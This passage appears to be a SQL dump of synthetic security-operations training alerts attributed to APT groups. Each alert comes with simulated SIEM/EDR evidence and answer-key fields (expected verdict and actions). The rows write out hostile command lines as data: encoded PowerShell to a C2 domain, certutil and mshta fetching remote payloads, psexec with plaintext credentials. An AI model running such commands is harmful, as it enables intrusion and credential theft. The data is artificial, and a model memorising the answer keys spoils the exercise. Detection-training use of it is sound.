(1418, 'APT29 Data Exfiltration via Encoded Powershell', 'critical', 'CrowdStrike', 'APT29\'s stealthy data exfiltration attempt using encoded PowerShell commands to communicate with an external C2 server.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.2.4.15\",\"dst_ip\":\"203.0.113.56\",\"username\":\"analyst.dave\",\"hostname\":\"Trade-Workstation-12\",\"command_line\":\"powershell.exe -enc UwBvAHUAcgBjAGUAPQBoAHQAdABwADoALwAvAGMAbQBkAC4AZABvAG0AYQBpAG4ALgBjAG8AbQAvAGMAbwBtAG0AYQBuAGQALgBwAHMAMwA=\",\"domain\":\"cmd.domain.com\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure for APT29\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc UwBvAHUAcgBjAGUAPQBoAHQAdABwADoALwAvAGMAbQBkAC4AZABvAG0AYQBpAG4ALgBjAG8AbQAvAGMAbwBtAG0AYQBuAGQALgBwAHMAMwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"cmd.domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication in APT29 operations\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of encoded PowerShell for data exfiltration is consistent with APT29\'s tactics, techniques, and procedures.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1419, 'APT28 Internal Reconnaissance with Certutil', 'high', 'Splunk', 'APT28 was observed conducting internal reconnaissance using certutil to download a reconnaissance tool within the network.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.3.5.10\",\"dst_ip\":\"10.3.5.20\",\"username\":\"it.support\",\"hostname\":\"Server-Admin-01\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.3.5.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for potential reconnaissance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used to download malicious tools\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Certutil was used to download a file, a common method for internal reconnaissance, in line with APT28\'s known behavior.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f 
http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.966Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.3.5.10\\\",\\\"dst_ip\\\":\\\"10.3.5.20\\\",\\\"username\\\":\\\"it.support\\\",\\\"hostname\\\":\\\"Server-Admin-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious-link.com/tool.bin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1420, 'Fancy Bear Credential Dump using mshta', 'critical', 'Cuckoo Sandbox', 'Detected mshta used to execute a malicious HTA file to dump credentials, linked to Fancy Bear\'s operations.', 'Credential Access', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.4.6.50\",\"dst_ip\":\"10.4.6.51\",\"username\":\"finance.mgr\",\"hostname\":\"Finance-PC-11\",\"command_line\":\"mshta http://malicious-site.com/malicious.hta\"}', '2026-03-02 03:14:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.4.6.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"mshta fetching and running a remotely hosted HTA is signed-binary proxy execution (T1218.005); the HTA acts as the loader that stages the credential-dumping payload\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of mshta to execute a remotely hosted HTA file aligns with Fancy Bear\'s credential access tradecraft. Treat the finance.mgr credentials and any others cached on Finance-PC-11 as compromised: isolate the host, reset the credentials and collect forensics.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta 
http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1421, 'APT41 Spear-Phishing Campaign Targeting Energy Sector', 'critical', 'MISP', 'A spear-phishing email was detected attempting to deliver a fileless malware payload using a malicious link. The campaign is attributed to APT41.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01.energycorp.local\",\"email_sender\":\"alert@energy-updates.com\",\"url\":\"http://malicious-update.com/download?file=update.exe\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-update.com/download?file=update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malware for phishing campaign\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alert@energy-updates.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with known phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains indicators of a known APT41 phishing campaign targeting energy sector employees.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1422, 'Lazarus Group Lateral Movement Detected via PSExec', 'high', 'ThreatConnect', 'Suspicious lateral movement activity detected using PSExec from an internal IP associated with the Lazarus Group.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T13:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"server01.energycorp.local\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.15 -u admin -p password cmd.exe\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.15 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for lateral movement matches known techniques used by the Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p 
password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1423, 'Fancy Bear Data Exfiltration via GitHub C2', 'critical', 'Anomali', 'Data exfiltration detected using a GitHub repository for C2 communication. Activity attributed to Fancy Bear/APT28.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"140.82.112.4\",\"username\":\"analyst\",\"hostname\":\"workstation02.energycorp.local\",\"url\":\"https://github.com/user/repo\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in exfiltration activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://github.com/user/repo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"GitHub repository used as C2 channel\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Detected exfiltration matches Fancy Bear\'s use of GitHub for covert C2 operations.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1424, 'Suspicious Login Attempts from Tor Exit Node', 'medium', 'Recorded Future', 'Multiple failed login attempts detected from a known Tor exit node. Investigation found no successful authentication or follow-on activity from the source.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.220.101.19\",\"dst_ip\":\"192.168.3.5\",\"username\":\"guest\",\"hostname\":\"gateway.energycorp.local\",\"failed_attempts\":12}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.19\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP identified as a Tor exit node; exit nodes carry mixed traffic and are a routine source of low-volume opportunistic SSH scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Twelve failed attempts against the guest account on the gateway came from a Tor exit node, with no successful authentication or follow-on activity from that source, so this is opportunistic scanning noise rather than a targeted attack. Confirm there is no successful login from the same source before closing.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user guest from 185.220.101.19 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:54:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user guest from 185.220.101.19 port 49202 ssh2 [Repeated event count: 
